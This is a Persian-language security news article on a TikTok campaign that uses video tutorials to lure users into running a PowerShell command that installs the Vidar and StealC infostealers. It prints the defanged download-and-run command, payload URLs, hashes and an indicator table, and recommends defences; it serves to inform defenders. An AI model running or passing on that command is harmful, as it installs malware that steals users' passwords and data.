یک کمپین پیچیده مهندسی اجتماعی اخیراً در TikTok شناسایی شده که از محبوبیت گسترده این پلتفرم و الگوریتمهای آن برای توزیع بدافزارهای سرقت اطلاعات، بهویژه Vidar و StealC سوءاستفاده میکند.
بر اساس گزارش Trend Research، این حمله با استفاده از ویدیوهایی (احتمالاً تولیدشده توسط هوش مصنوعی) کاربران را فریب میدهد تا دستورات مخرب PowerShell را به بهانه فعالسازی نرمافزارهای کرکشده مانند Windows، Microsoft Office، CapCut و Spotify اجرا کنند.
تهدید جدید مهندسی اجتماعی در رسانههای اجتماعی
برخلاف روشهای سنتی توزیع بدافزار مانند صفحات CAPTCHA جعلی، این کمپین کاملاً به محتوای ویدیویی متکی است و از این طریق کاربران را وادار به اجرای دستورات مخرب میکند — موضوعی که تشخیص آن را برای ابزارهای امنیتی سنتی بسیار دشوار میسازد.
کمپین از طریق حسابهای TikTok نظیر @gitallowed، @zane.houghton و @allaivo2 آغاز میشود که ویدیوهای آموزشی منتشر میکنند. این ویدیوها کاربران را راهنمایی میکنند تا دکمههای Win + R را فشار دهند، PowerShell را باز کنند و دستور زیر را وارد و اجرا کنند:
iex (irm hxxps://allaivo[.]me/spotify)
این اسکریپت مخرب (با هش SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) پوشههایی مخفی در مسیرهای APPDATA و LOCALAPPDATA ایجاد کرده، آنها را به استثنائات Windows Defender اضافه میکند و payload ثانویهای مانند Vidar یا StealC را از URLهایی نظیر hxxps://amssh[.]co/file.exe دانلود میکند.
زنجیره فنی حمله
-
بدافزار از طریق کلیدهای رجیستری ماندگاری پیدا میکند و به سرورهای فرمان و کنترل (C2) متصل میشود.
-
برای پنهانسازی زیرساخت خود، از سرویسهای معتبر مانند Steam (
steamcommunity[.]com/profiles/76561199846773220) و Telegram بهعنوان Dead Drop Resolver استفاده میکند. -
استفاده از محتوای تولیدشده توسط AI و راهنماییهای صوتی و تصویری در ویدیوها، نشانگر تغییر روند به سوی حملات مقیاسپذیر، پنهانکار و مبتنی بر اعتماد کاربران است.
پیامدها و اقدامات امنیتی
بدافزارهای Vidar و StealC میتوانند منجر به سرقت اطلاعات، افشای رمزها، و نفوذ به سیستمهای حساس شوند. از آنجا که هیچ کدی در خود پلتفرم TikTok قرار ندارد، راهکارهای سنتی مانند اسکن لینک یا اعتبارسنجی دامنه نمیتوانند بهطور مؤثر این تهدید را شناسایی کنند.
طبق گزارش، راهکار Trend Vision One قابلیت شناسایی و مسدودسازی شاخصهای نفوذ (IOCs)، اجرای جستجوهای هدفمند و تحلیل تهدید برای شناسایی سریعتر این حملات را ارائه میدهد.
راهکارهای پیشنهادی
-
پایش دقیق رسانههای اجتماعی
-
تحلیل رفتاری PowerShell برای کشف فعالیتهای غیرمعمول
-
آموزش کاربران درباره تهدیدات ویدیویی و مهندسی اجتماعی
شاخصهای نفوذ (Indicators of Compromise – IOCs)
| نوع | مقدار |
|---|---|
| File Hash | 3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9b |
| File Hash | afc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5 |
| File Hash | b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886 |
| URL | hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php |
| URL | hxxps://allaivo[.]me/spotify |
| URL | hxxps://amssh[.]co/file[.]exe |
| URL | hxxps://amssh[.]co/script[.]ps1 |
| URL | hxxps://steamcommunity[.]com/profiles/76561199846773220 |
| URL | hxxps://t[.]me/v00rd |
| IP Address | ۴۹[.]۱۲[.]۱۱۳[.]۲۰۱ |
| IP Address | ۱۱۶[.]۲۰۲[.]۶[.]۲۱۶ |
یک نظر